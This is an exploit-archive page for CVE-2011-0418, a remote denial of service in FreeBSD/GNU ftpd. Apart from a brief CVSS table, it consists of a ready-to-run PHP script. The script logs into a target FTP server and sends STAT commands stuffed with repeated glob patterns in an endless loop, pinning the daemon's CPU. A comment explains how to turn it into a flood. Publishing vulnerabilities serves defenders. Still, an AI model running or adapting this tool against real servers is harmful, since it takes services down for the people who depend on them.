Bug: FreeBSD/GNU ftpd remote denial of service exploit ( Ascii Version )

Search:
WLB2

FreeBSD/GNU ftpd remote denial of service exploit

Published / (Updated)
Credit
Risk
2013-01-31 / 2013-02-01
DevilTeam
Medium
CWE
CVE
Local
Remote
CWE-399
CVE-2011-0418
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4/10
2.9/10
8/10
Exploit range
Attack complexity
Authentication
Remote
Low
Single time
Confidentiality impact
Integrity impact
Availability impact
None
None
Partial

<?php
//PoC by Kacper R. from devilteam.pl
//Bug found by: Maksymilian ( cxsec.org )

set_time_limit(0);
if(isset($_GET['runit'])){
flush();
while(1){
$fp = fsockopen($_GET['host'], $_GET['port'], $errno, $errstr, 5);
fread($fp,1024);
fwrite($fp, "USER ".$_GET['user']."\r\n"); fread($fp,1024);
fwrite($fp, "PASS ".$_GET['pass']."\r\n"); fread($fp,1024);
fwrite($fp, "STAT ".str_repeat(chr(123).chr(97).chr(44).chr(98).chr(125),64)."\r\n");
fclose($fp);
time_nanosleep(0,300000000);//delete to flood
flush();
}
}
if(!isset($_GET['host'])) $_GET['host']='localhost'; if(!isset($_GET['port'])) $_GET['port']='21';
if(!isset($_GET['user'])) $_GET['user']='anonymous'; if(!isset($_GET['pass'])) $_GET['pass']='anonymous';
echo '<html><head><title>FreeBSD 9.1 ftpd Remote Denial of
Service</title></head><body>
<h1>FreeBSD 9.1 ftpd Remote Denial of Service</h1><P><form action=""
method="GET">
<PRE>
Host: <input type="text" name="host" value="'.$_GET['host'].'">
Port: <input type="text" name="port" value="'.$_GET['port'].'">
User: <input type="text" name="user" value="'.$_GET['user'].'">
Pass: <input type="text" name="pass" value="'.$_GET['pass'].'">
</PRE>
</p>';
if(isset($_GET['confirm'])){
echo '<input type="submit" value="!!!!!!Confirm !!!!!! And click this again when stop"
name="runit">';
echo '<p><br /><a href="https://devilteam.pl/"><img
src="https://devilteam.pl/images/dt2.gif"></a><a
href="http://cxsecurity.com/"><img src="http://cxsec.com/images/wlb/cxsecbannersmal.png"
width="100" hight="40"></a>';
} else{
echo '<input type="submit" value="Create ftpd process 100% CPU" name="confirm">';
echo '<p><br /><a href="https://devilteam.pl/"><img
src="https://devilteam.pl/images/dt.gif"></a><a href="http://cxsecurity.com/"
><img src="http://cxsec.com/images/wlb/cxsecbanersmal.png" width="100"
hight="40"></a>';
}
echo '
</form>
</body>
</html>';
?>

References:

https://devilteam.pl
http://cxsecurity.com/issue/WLB-2013020003

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version